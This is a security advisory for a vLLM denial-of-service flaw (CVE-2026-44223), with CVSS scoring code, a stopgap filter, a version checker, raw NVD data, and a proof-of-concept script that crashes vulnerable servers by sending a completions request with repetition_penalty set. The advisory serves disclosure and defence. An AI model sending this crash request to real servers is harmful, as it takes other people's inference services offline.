CVE-2026-44223

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.
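Because the trigger is limited to three request fields, a stopgap for deployments that cannot upgrade immediately could be to drop those fields before a request reaches the engine. The following is a minimal sketch under that assumption; `strip_penalties` and `PENALTY_KEYS` are hypothetical names, not part of vLLM, and the sketch assumes requests pass through a proxy or gateway you control. The only fix stated in the description is upgrading to 0.20.0.

```python
# Hypothetical gateway-side filter: remove the sampling penalty fields named
# in the CVE description from a request body before forwarding it.
PENALTY_KEYS = ("repetition_penalty", "frequency_penalty", "presence_penalty")


def strip_penalties(payload: dict) -> tuple[dict, list[str]]:
    """Return a copy of payload without penalty fields, plus the removed keys."""
    removed = [key for key in PENALTY_KEYS if key in payload]
    cleaned = {key: value for key, value in payload.items() if key not in PENALTY_KEYS}
    return cleaned, removed


request_body = {
    "prompt": "Explain this vulnerability.",
    "max_tokens": 50,
    "repetition_penalty": 1.1,
}
cleaned_body, removed_keys = strip_penalties(request_body)
print(cleaned_body)
print(removed_keys)
```

Dropping the fields changes sampling behavior for the affected requests, so this trades output fidelity for availability and is only reasonable as a temporary measure.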

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
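The 6.5 score can be reproduced from the vector string. The sketch below applies the CVSS v3.1 base score equations and metric weights from the FIRST specification; the function names are illustrative, and temporal and environmental metrics are not handled.

```python
import math

# Metric weights from the CVSS v3.1 specification (base metrics only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required depends on Scope (U = unchanged, C = changed).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """Round up to one decimal place as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def score_breakdown(vector: str) -> tuple[float, float, float]:
    """Return (base score, exploitability subscore, impact subscore)."""
    prefix, *pairs = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError(f"unsupported vector prefix: {prefix}")
    m = dict(pair.split(":") for pair in pairs)
    scope = m["S"]

    iss = 1 - (1 - WEIGHTS["C"][m["C"]]) * (1 - WEIGHTS["I"][m["I"]]) * (1 - WEIGHTS["A"][m["A"]])
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (
        8.22 * WEIGHTS["AV"][m["AV"]] * WEIGHTS["AC"][m["AC"]]
        * PR_WEIGHTS[scope][m["PR"]] * WEIGHTS["UI"][m["UI"]]
    )

    if impact <= 0:
        base = 0.0
    elif scope == "U":
        base = roundup(min(impact + exploitability, 10))
    else:
        base = roundup(min(1.08 * (impact + exploitability), 10))
    return base, round(exploitability, 1), round(impact, 1)


print(score_breakdown("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"))
# -> (6.5, 2.8, 3.6)
```

For this vector the impact subscore is 6.42 × 0.56 ≈ 3.60 and the exploitability subscore is 8.22 × 0.85 × 0.77 × 0.62 × 0.85 ≈ 2.84; their sum, about 6.43, rounds up to 6.5.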

Configurations (Affected Products)

No configuration data available.

vLLM < 0.20.0
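A quick way to check a host against this range is to compare the installed vLLM version with the fixed release. The sketch below is one possible check using only the standard library; `parse_release`, `is_affected`, and `installed_vllm_is_affected` are hypothetical helper names. It tests only the upper bound, since the description does not state the first affected version, and it ignores pre-release or local suffixes such as `rc1` or `.dev`.

```python
import re
from importlib import metadata

FIXED_VERSION = (0, 20, 0)  # first fixed release per the CVE description


def parse_release(version: str) -> tuple:
    """Extract the leading numeric release, e.g. '0.19.1rc1' -> (0, 19, 1)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if match is None:
        raise ValueError(f"cannot parse version: {version!r}")
    parts = [int(part) for part in match.group(0).split(".")]
    parts += [0] * (3 - len(parts))  # pad '0.19' to (0, 19, 0)
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True if the release is numerically lower than the fixed version."""
    return parse_release(version) < FIXED_VERSION


def installed_vllm_is_affected():
    """Check the locally installed vllm package; None if it is not installed."""
    try:
        return is_affected(metadata.version("vllm"))
    except metadata.PackageNotFoundError:
        return None


print(is_affected("0.19.1"))
print(is_affected("0.20.0"))
print(installed_vllm_is_affected())
```

Comparing integer tuples rather than strings matters here: as strings, "0.9.2" would sort after "0.20.0" and be reported as unaffected.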

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-44223
# Target: vLLM server versions < 0.20.0
# Description: This script sends a request with a repetition_penalty parameter
# to trigger the tensor shape mismatch bug in the speculative decoding proposer.
# Per the CVE description, the bug is in the extract_hidden_states proposer, so
# a server that does not use that proposer is not expected to crash.

def check_vulnerability(target_url):
    endpoint = f"{target_url.rstrip('/')}/v1/completions"

    # Payload containing the sampling penalty parameter that triggers the crash
    payload = {
        "model": "meta-llama/Llama-2-7b-chat-hf",  # Example model name
        "prompt": "Explain this vulnerability.",
        "max_tokens": 50,
        # The presence of 'repetition_penalty' triggers the incorrect tensor shape
        "repetition_penalty": 1.1
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        # json= serializes the payload and sets the Content-Type header
        response = requests.post(endpoint, json=payload, timeout=10)

        # If the server crashes, the connection might be reset or return a 500 error
        if response.status_code in (500, 502):
            print(f"[+] Potential vulnerability triggered! Server returned error code: {response.status_code}")
        elif "RuntimeError" in response.text or "Internal Server Error" in response.text:
            print("[+] Vulnerability likely triggered. RuntimeError detected in response.")
        else:
            print("[-] Request completed. Server might be patched or not vulnerable.")
            print("Response status:", response.status_code)

    except requests.exceptions.Timeout:
        # A read timeout is not a ConnectionError, so handle it separately
        print("[+] Request timed out. The EngineCore process may have crashed or hung (DoS).")
    except requests.exceptions.ConnectionError:
        print("[+] Connection error. The EngineCore process may have crashed (DoS).")
    except requests.exceptions.RequestException as e:
        print(f"[-] An unexpected error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8000"
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44223
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44223
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44223/
[4] VulDB https://vuldb.com/cve/CVE-2026-44223
[5] https://github.com/vllm-project/vllm/pull/38610
[6] https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44223", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.293", "lastModified": "2026-05-12T20:16:43.293", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., \"repetition_penalty\": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}, {"lang": "en", "value": "CWE-704"}]}], "references": [{"url": "https://github.com/vllm-project/vllm/pull/38610", "source": "[email protected]"}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw", "source": "[email protected]"}]}}
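For triage tooling, the fields of interest can be pulled out of a record shaped like the one above. The sketch below uses a trimmed copy of that record (descriptions and source fields omitted); `summarize` is a hypothetical helper, and the key names are taken from this record only, not from a guarantee about every NVD entry.

```python
import json

# Trimmed copy of the record above: only the fields used by summarize().
RECORD_TEXT = """
{"cve": {"id": "CVE-2026-44223",
  "metrics": {"cvssMetricV31": [{"cvssData": {
    "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
    "baseScore": 6.5, "baseSeverity": "MEDIUM"}}]},
  "weaknesses": [{"description": [
    {"lang": "en", "value": "CWE-131"},
    {"lang": "en", "value": "CWE-704"}]}],
  "references": [
    {"url": "https://github.com/vllm-project/vllm/pull/38610"},
    {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw"}]}}
"""


def summarize(record: dict) -> dict:
    """Collect the ID, CVSS v3.1 data, CWE IDs, and reference URLs."""
    cve = record["cve"]
    cvss = cve["metrics"]["cvssMetricV31"][0]["cvssData"]
    cwes = [
        entry["value"]
        for weakness in cve.get("weaknesses", [])
        for entry in weakness["description"]
    ]
    return {
        "id": cve["id"],
        "base_score": cvss["baseScore"],
        "severity": cvss["baseSeverity"],
        "vector": cvss["vectorString"],
        "cwes": cwes,
        "references": [ref["url"] for ref in cve.get("references", [])],
    }


summary = summarize(json.loads(RECORD_TEXT))
print(summary["id"], summary["base_score"], summary["severity"], summary["cwes"])
```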